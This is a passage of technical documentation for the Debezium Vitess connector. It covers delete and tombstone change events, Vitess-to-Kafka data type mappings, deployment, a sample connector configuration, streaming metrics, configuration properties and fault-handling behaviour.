1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-47\\\"}]\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\nVitess connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[vitess-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the Vitess connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-vitess-connectors-map-data-types\n\/\/ Title: How {prodname} Vitess connectors map data types\n[[vitess-data-types]]\n== Data type mappings\n\nThe Vitess connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Vitess data type of the column. This section describes these mappings.\n\n[id=\"vitess-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic Vitess data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Vitess basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Vitess data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN, BOOL`\n|`INT16`\na|_n\/a_\n\n|`BIT(1)`\n|Unsupported yet\na|_n\/a_\n\n|`BIT(>1)`\n|Unsupported yet\na|_n\/a_\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`VARBINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`TINYBLOB`\n|`BYTES`\na|_n\/a_\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES`\na|_n\/a_\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES`\na|_n\/a_\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES`\na|_n\/a_\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`STRING`\n|_n\/a_\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision based on UTC. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|Unsupported yet\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-vitess-to-run-a-debezium-connector\n\/\/ Title: Setting up Vitess to run a {prodname} connector\n[[setting-up-vitess]]\n== Seting up Vitess\n\n{prodname} does not require any specific configuration for use with Vitess. Install Vitess according to the standard instructions in the link:https:\/\/vitess.io\/docs\/get-started\/local-docker\/[Local Install via Docker] guide, or the link:https:\/\/vitess.io\/docs\/get-started\/operator\/[Vitess Operator for Kubernetes] guide.\n\n.Checklist\n\n* Make sure that the VTGate host and its gRPC port (default is 15991) is accessible from the machine where the Vitess connector is installed\n* Make sure that the VTCtld host and its gRPC port (default is 15999) is accessible from the machine where the Vitess connector is installed\n\n\/\/ Type: procedure\n\/\/ ModuleID: grpc-authentication\n\/\/ Title: gRPC authentication for a {prodname} connector\n[[grpc-authentication]]\n=== gRPC authentication\n\nBecause Vitess connector reads change events from the VTGate VStream gRPC server, it does not need to connect directly to MySQL instances. Therefore, no special database user and permissions are needed. At the moment, Vitess connector only supports unauthenticated access to the VTGate gRPC server.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-and-managing-debezium-vitess-connectors\n\/\/ Title: Deploying and managing {prodname} Vitess connectors\n[[vitess-deploying-a-connector]]\n== Deployment\n\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Vitess connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-vitess\/{debezium-version}\/debezium-connector-vitess-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Vitess connector already installed and ready to run. You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\n\/\/ Type: concept\n\/\/ ModuleID:debezium-vitess-connector-configuration-example\n\/\/ Title: {prodname} Vitess connector configuration example\n[[vitess-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a Vitess connector that connects to a Vitess (VTGate's VStream) server on port 15991 at 192.168.99.100, whose logical name is `fullfillment`. It also connects to a VTCtld server on port 15999 at 192.168.99.101 to get the initial VGTID. Typically, you configure the {prodname} Vitess connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.vitess.VitessConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"15991\", \/\/ <4>\n \"database.user\": \"vitess\", \/\/ <5>\n \"database.password\": \"vitess_password\", \/\/ <6>\n \"vitess.keyspace\": \"commerce\", \/\/ <7>\n \"vitess.tablet.type\": \"MASTER\", \/\/ <8>\n \"vitess.vtctld.host\": \"192.168.99.101\", \/\/ <9>\n \"vitess.vtctld.port\": \"15999\", \/\/ <10>\n \"vitess.vtctld.user\": \"vitess\", \/\/ <11>\n \"vitess.vtctld.password\": \"vitess_password\", \/\/ <12>\n \"database.server.name\": \"fullfillment\", \/\/ <13>\n \"tasks.max\": 1 \/\/ <14>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Vitess connector class.\n<3> The address of the Vitess (VTGate's VStream) server.\n<4> The port number of the Vitess (VTGate's VStream) server.\n<5> The username of the Vitess database server (VTGate gRPC).\n<6> The password of the Vitess database server (VTGate gRPC).\n<7> The name of the keyspce (a.k.a database). Because no shard is specified, it reads change events from all shards in the keyspace.\n<8> The type of MySQL instance (MASTER OR REPLICA) to read change events from.\n<9> The address of the VTCtld server.\n<10> The port of the VTCtld server.\n<11> The username of the VTCtld server (VTCtld gRPC).\n<12> The password of the VTCtld database server (VTCtld gRPC).\n<13> The logical name of the Vitess cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<14> Only one task should operate at any one time.\n\nSee the xref:vitess-connector-properties[complete list of Vitess connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts the connector task that connects to the Vitess database and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-vitess-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Vitess connector configuration to Kafka Connect\n[[vitess-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a Vitess connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The VTGate host and its gRPC port (default is 15991) is accessible from the machine where the Vitess connector is installed\n\n* The VTCtld host and its gRPC port (default is 15999) is accessible from the machine where the Vitess connector is installed\n\n* The Vitess connector is installed.\n\n.Procedure\n\n. Create a configuration for the Vitess connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\n.Results\n\nWhen the connector starts, it starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-vitess-connector-performance\n\/\/ Title: Monitoring {prodname} Vitess connector performance\n[[vitess-monitoring]]\n=== Monitoring\n\nThe {prodname} Vitess connector provides only one type of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* xref:vitess-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nxref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-vitess-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Vitess connector record streaming\n[[vitess-streaming-metrics]]\n==== Streaming metrics\n\nThe *MBean* is `debezium.vitess:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-strm-metric-millisecondssincelastevent]]<<connectors-strm-metric-millisecondssincelastevent, `+MilliSecondsSinceLastEvent+`>>\n|`long`\n|The number of milliseconds since the connector has read and processed the most recent event.\n\n|[[connectors-strm-metric-totalnumberofeventsseen]]<<connectors-strm-metric-totalnumberofeventsseen, `+TotalNumberOfEventsSeen+`>>\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|[[connectors-strm-metric-numberofeventsfiltered]]<<connectors-strm-metric-numberofeventsfiltered, `+NumberOfEventsFiltered+`>>\n|`long`\n|The number of events that have been filtered by include\/exclude list filtering rules configured on the connector.\n\n|[[connectors-strm-metric-queuetotalcapacity]]<<connectors-strm-metric-queuetotalcapacity, `+QueueTotalCapacity+`>>\n|`int`\n|The length the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-queueremainingcapacity]]<<connectors-strm-metric-queueremainingcapacity, `+QueueRemainingCapacity+`>>\n|`int`\n|The free capacity of the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-connected]]<<connectors-strm-metric-connected, `+Connected+`>>\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the database server.\n\n|[[connectors-strm-metric-millisecondsbehindsource]]<<connectors-strm-metric-millisecondsbehindsource, `+MilliSecondsBehindSource+`>>\n|`long`\n|The number of milliseconds between the last change event's timestamp and the connector processing it.\nThe values will incoporate any differences between the clocks on the machines where the database server and the connector are running.\n\n|[[connectors-strm-metric-numberofcommittedtransactions]]<<connectors-strm-metric-numberofcommittedtransactions, `+NumberOfCommittedTransactions+`>>\n|`long`\n|The number of processed transactions that were committed.\n\n|[[connectors-strm-metric-maxqueuesizeinbytes]]<<connectors-strm-metric-maxqueuesizeinbytes, `+MaxQueueSizeInBytes+`>>\n|`long`\n|The maximum buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-currentqueuesizeinbytes]]<<connectors-strm-metric-currentqueuesizeinbytes, `+CurrentQueueSizeInBytes+`>>\n|`long`\n|The current buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-configuration-properties\n\/\/ Title: Description of {prodname} Vitess connector configuration properties\n[[vitess-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} Vitess connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:vitess-required-configuration-properties[Required configuration properties]\n* xref:vitess-advanced-configuration-properties[Advanced configuration properties]\n* xref:vitess-pass-through-properties[Pass-through configuration properties]\n\n[id=\"vitess-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-name]]<<vitess-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[vitess-property-connector-class]]<<vitess-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.vitess.VitessConnector` for the Vitess connector.\n\n|[[vitess-property-tasks-max]]<<vitess-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Vitess connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[vitess-property-database-hostname]]<<vitess-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Vitess database server (VTGate).\n\n|[[vitess-property-database-port]]<<vitess-property-database-port, `+database.port+`>>\n|`15991`\n|Integer port number of the Vitess database server (VTGate).\n\n|[[vitess-property-keyspace]]<<vitess-property-keyspace, `+vitess.keyspace+`>>\n|\n|The name of the keyspace from which to stream the changes.\n\n|[[vitess-property-shard]]<<vitess-property-shard, `+vitess.shard+`>>\n|_n\/a_\n|An optional name of the shard from which to stream the changes. If not configured, in case of unsharded keyspace, the connector streams changes from the only shard, in case of sharded keyspace, the connector streams changes from all shards in the keyspace. We recommend not configuring it in order to stream from all shards in the keyspace because it has better support for reshard operation. If configured, for example, `-80`, the connector will stream changes from the `-80` shard.\n\n|[[vitess-property-gtid]]<<vitess-property-gtid, `+vitess.gtid+`>>\n|`current`\n|An optional GTID position for a shard to stream from. This has to be set together with `vitess.shard`. If not configured, the connector streams changes from the latest position for the given shard.\n\n|[[vitess-property-stop-on-reshard]]<<vitess-property-stop-on-reshard, `+vitess.stop_on_reshard+`>>\n|`false`\n|Controls Vitess flag stop_on_reshard. +\n +\n`true` - the stream will be stopped after a reshard operation. +\n +\n`false` - the stream will be automatically migrated for the new shards after a reshard operation. +\n +\nIf set to `true`, you should also consider setting `vitess.gtid` in the configuration.\n\n|[[vitess-property-database-user]]<<vitess-property-database-user, `+vitess.database.user+`>>\n|_n\/a_\n|An optional username of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-database-password]]<<vitess-property-database-password, `+vitess.database.password+`>>\n|_n\/a_\n|An optional password of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-tablet-type]]<<vitess-property-tablet-type, `+vitess.tablet.type+`>>\n|`MASTER`\n|The type of Tablet (hence MySQL) from which to stream the changes: +\n +\n`MASTER` represents streaming from the master MySQL instance +\n +\n`REPLICA` represents streaming from the replica slave MySQL instance +\n +\n`RDONLY` represents streaming from the read-only slave MySQL instance.\n\n|[[vitess-property-database-server-name]]<<vitess-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Vitess database server or cluster in which {prodname} is capturing changes.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name.\nThe logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n+\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[vitess-property-table-include-list]]<<vitess-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _keyspace_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[vitess-property-table-exclude.list]]<<vitess-property-table-exclude.list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has it changes captured. Each identifier is of the form _keyspace_._tableName_. Do not also set the `table.include.list` property.\n\n|[[vitess-property-column-include-list]]<<vitess-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[vitess-property-column-exclude-list]]<<vitess-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[vitess-property-tombstones-on-delete]]<<vitess-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[vitess-property-message-key-columns]]<<vitess-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_keyspace-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`keyspaceA.table_a:regex_1;keyspaceA.table_b:regex_2;keyspaceA.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n|===\n\n[id=\"vitess-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-event-processing-failure-handling-mode]]<<vitess-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. +\n +\n`skip` skips the problematic event and continues processing.\n\n|[[vitess-property-max-queue-size]]<<vitess-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size]`.\n\n|[[vitess-property-max-batch-size]]<<vitess-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[vitess-property-max-queue-size-in-bytes]]<<vitess-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:vitess-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[vitess-property-poll-interval-ms]]<<vitess-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[vitess-property-sanitize-field-names]]<<vitess-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to xref:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[vitess-property-skipped-operations]]<<vitess-property-skipped-operations, `+skipped.operations+`>>\n|\n| comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[vitess-property-provide-transaction-metadata]]<<vitess-property-provide-transaction-metadata, `provide.transaction.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See xref:vitess-transaction-metadata[Transaction metadata] for details.\n\n|[[vitess-property-transaction-topic]]<<vitess-property-transaction-topic, `transaction.topic`>>\n|`${database.server.name}.transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The placeholder `${database.server.name}` can be used for referring to the connector's logical name; defaults to `${database.server.name}.transaction`, for example `dbserver1.transaction`.\n\n|[[vitess-property-keepalive-interval-ms]]<<vitess-property-keepalive-interval-ms, `+vitess.keepalive.interval.ms+`>>\n|`Long.MAX_VALUE`\n|Control the interval between periodic gPRC keepalive pings for VStream. Defaults to `Long.MAX_VALUE` (disabled).\n\n|[[vitess-property-grpc-headers]]<<vitess-property-grpc-headers, `+vitess.grpc.headers+`>>\n|\n|Specify a comma-separated list of gRPC headers. Defaults to empty. The format is: +\n +\n_key1:value1,key2:value2_,... +\n +\nFor example, +\n +\n`x-envoy-upstream-rq-timeout-ms:0,x-envoy-max-retries:2`\n\n|[[vitess-property-column-propagate-source-type]]<<vitess-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\n|[[vitess-property-datatype-propagate-source-type]]<<vitess-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\nSee xref:vitess-data-types[how Vitess connectors map data types] for the list of Vitess-specific data type names.\n\n\n|===\n\n[id=\"vitess-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The Vitess connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} Vitess connectors handle faults and problems\n[[vitess-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\n\n[id=\"vitess-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to Vitess by using the specified connection parameters.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the Vitess problem, restart the connector.\n\n[id=\"vitess-becomes-unavailable\"]\n=== Vitess becomes unavailable\n\nWhen the connector is running, the Vitses server (VTGate) that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe Vitess connector externally stores the last processed offset in the form of a Vitess VGTID. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset.\n\n[id=\"invalid-column-name-error\"]\n=== Invalid column name error\n\nThis error happens very rarely. If you receive an error with the message `Illegal prefix '@' for column: x, from schema: y, table: z`, and your table doesn't have such a column, it is a Vitess vstream link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[bug] that is caused by column renaming or column type change. It is a transient error. You can restart the connector after a small backoff and it should resolve automatically.\n\n[id=\"vitess-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"vitess-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, Vitess connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the Vitess server's time of the event, the position in the binlog where the transaction changes were written. Consumers can keep track of this information, especially the VGTID, to determine whether an event is a duplicate.\n\n[id=\"vitess-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka 